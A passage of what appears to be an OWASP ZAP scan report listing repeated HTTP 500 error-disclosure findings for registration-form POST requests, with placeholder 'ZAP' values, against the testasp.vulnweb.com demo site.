<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 445 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
